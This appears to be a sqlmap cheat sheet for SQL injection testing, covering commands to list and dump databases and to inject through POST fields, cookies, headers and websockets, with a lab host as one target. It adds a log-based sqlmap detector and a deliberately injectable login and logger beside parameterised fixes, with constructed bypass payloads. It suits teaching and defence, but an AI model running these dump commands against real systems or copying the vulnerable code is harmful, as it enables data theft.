SQLmap

Operators

--batch -> Non-interactive mode.

--dbms -> Type of database being used (e.g. mysql).

--threads -> Number of threads, from 1 to 10.


Data

  • To retrieve everything:

--all --dump

  • To list all the databases:

--dbs

  • To look at the tables of a specific database:

-D database --tables

  • Repeat the same process for the columns:

-D database -T table --columns

  • To dump the data:

-D database -T table --dump

  • Or dump just one column:

-D database -T table -C column --dump

--level

This option sets the level of tests, with values ranging from 1 to 5 (the default is level 1).

  • Level 1: Basic tests, only the most common and least intrusive SQL injection tests are performed.

  • Level 2-4: These levels increase the range and types of tests performed, with more advanced and varied testing.

  • Level 5: Performs the most comprehensive set of tests, including advanced and highly invasive tests. It increases the risk of being detected or causing issues on the target system.


--risk

This option sets the risk level of tests, with values ranging from 1 to 3 (the default is 1).

  • Risk 1: Basic, low-risk tests that are less likely to cause harm or be detected.

  • Risk 2: Performs potentially more intrusive or advanced techniques.

  • Risk 3: Attempts high-risk tests that could be more aggressive, such as testing for blind injections, time-based techniques, or dropping and modifying tables.
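Higher --level and --risk values (and more --threads) mean more requests carrying more varied payloads, which is what the "risk of being detected" above refers to. As an added example, not part of the original page or of the sqlmap project, the following Python script runs over constructed Apache combined-format access-log lines and flags a source either on sqlmap's default User-Agent string (of the form sqlmap/<version>#<branch> (https://sqlmap.org)) or on repeated requests whose decoded URL carries boolean-based, time-based or UNION-based markers. The log lines, IP addresses and the User-Agent value are constructed samples; the function names and the threshold in flag_sources are this example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample of Apache "combined" access-log lines (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /item?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /item?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /item?id=1%27%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2024:13:55:40 +0000] "GET /item?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers for the three test families the --level/--risk text above describes:
# boolean-based, time-based and UNION-based probes (matched on the URL-decoded path).
PAYLOAD_PATTERNS = [
    re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I),
]


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def looks_like_payload(path):
    """True if the decoded request path contains one of the injection markers."""
    decoded = unquote_plus(path)
    return any(p.search(decoded) for p in PAYLOAD_PATTERNS)


def analyze_log(text):
    """Count requests, sqlmap User-Agent hits and payload-shaped requests per source IP."""
    report = defaultdict(lambda: {"requests": 0, "ua_hits": 0, "payload_hits": 0})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ip"]]
        entry["requests"] += 1
        if "sqlmap" in rec["ua"].lower():
            entry["ua_hits"] += 1
        if looks_like_payload(rec["path"]):
            entry["payload_hits"] += 1
    return dict(report)


def flag_sources(report, min_payload_hits=2):
    """Flag a source on the User-Agent alone, or on repeated payload-shaped requests.
    The payload threshold still catches scans that hide the default User-Agent."""
    return sorted(ip for ip, e in report.items()
                  if e["ua_hits"] > 0 or e["payload_hits"] >= min_payload_hits)


if __name__ == "__main__":
    rep = analyze_log(SAMPLE_LOG)
    for ip, e in rep.items():
        print(ip, e)
    print("flagged:", flag_sources(rep))
```

The User-Agent check on its own is weak, since sqlmap's --random-agent and --user-agent options replace the default string; the payload markers and the per-source request count are the signals that survive that, and they are also the ones that grow with --level, --risk and --threads.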


HTTP

  • When working with an HTTP request, it is good practice to save the raw request to a file and pass it with the -r option:

sqlmap -r request.txt --level 5 --risk 3 --dump-all --batch

  • Use --force-ssl when working with HTTPS. Initiate the injection test:

sqlmap -r login.request --force-ssl --batch

  • When working with POST requests you need to use the --data option:

sqlmap -u "http://example.com" --data "username=*&password=*"

  • For cookies:

sqlmap -u "http://example.com" --cookie "cookie=INJECTION"

Headers

sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
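The --data, --cookie and --headers forms above all mark (with *) a value the application reads from the request and, if it is vulnerable, splices into a query. As an added example, not code from the original page or from sqlmap, here is the server-side root cause those tests look for, written in Python against an in-memory SQLite database: a login handler and an X-Forwarded-For logger built by string formatting, each beside its parameterised form. The table layout, the user record, the constructed payloads and the function names are this example's own assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.execute("CREATE TABLE access_log (client_ip TEXT)")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting: both POST fields become part of the SQL text,
    which is what --data "username=*&password=*" probes for."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL text,
    so quote characters in the input stay data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def log_client_vulnerable(conn, forwarded_for):
    """Header value concatenated into an INSERT, the --headers="x-forwarded-for:...*" case.
    Returns the number of rows in access_log afterwards."""
    conn.execute("INSERT INTO access_log VALUES ('%s')" % forwarded_for)
    return conn.execute("SELECT COUNT(*) FROM access_log").fetchone()[0]


def log_client_safe(conn, forwarded_for):
    """Same INSERT with a bound parameter: the whole header value is stored as one string."""
    conn.execute("INSERT INTO access_log VALUES (?)", (forwarded_for,))
    return conn.execute("SELECT COUNT(*) FROM access_log").fetchone()[0]


def demo():
    """Run both pairs against constructed inputs and return the observable outcomes."""
    conn = make_db()
    # Constructed boolean-style payload of the shape sqlmap's tests use.
    bypass = "' OR '1'='1"
    results = {
        "vulnerable_login_bypassed": login_vulnerable(conn, "alice", bypass),
        "safe_login_bypassed": login_safe(conn, "alice", bypass),
        "safe_login_correct_password": login_safe(conn, "alice", "correct-horse"),
    }
    # Constructed header value that closes the VALUES tuple and opens a second one.
    smuggled = "203.0.113.9'), ('injected"
    results["rows_after_vulnerable_insert"] = log_client_vulnerable(conn, smuggled)
    results["rows_after_safe_insert"] = log_client_safe(make_db(), smuggled)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The vulnerable login accepts the bypass because the closing quote in the password ends the string literal and the rest becomes SQL; the parameterised version compares the whole input as a password and rejects it. The header case shows the same defect in a query that never touches authentication, which is why sqlmap's --headers and --cookie injection points matter as much as form fields.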

Methods

PUT
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

Websockets

  • Install the Python websocket-client module.

  • Specify the port and the data:

sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3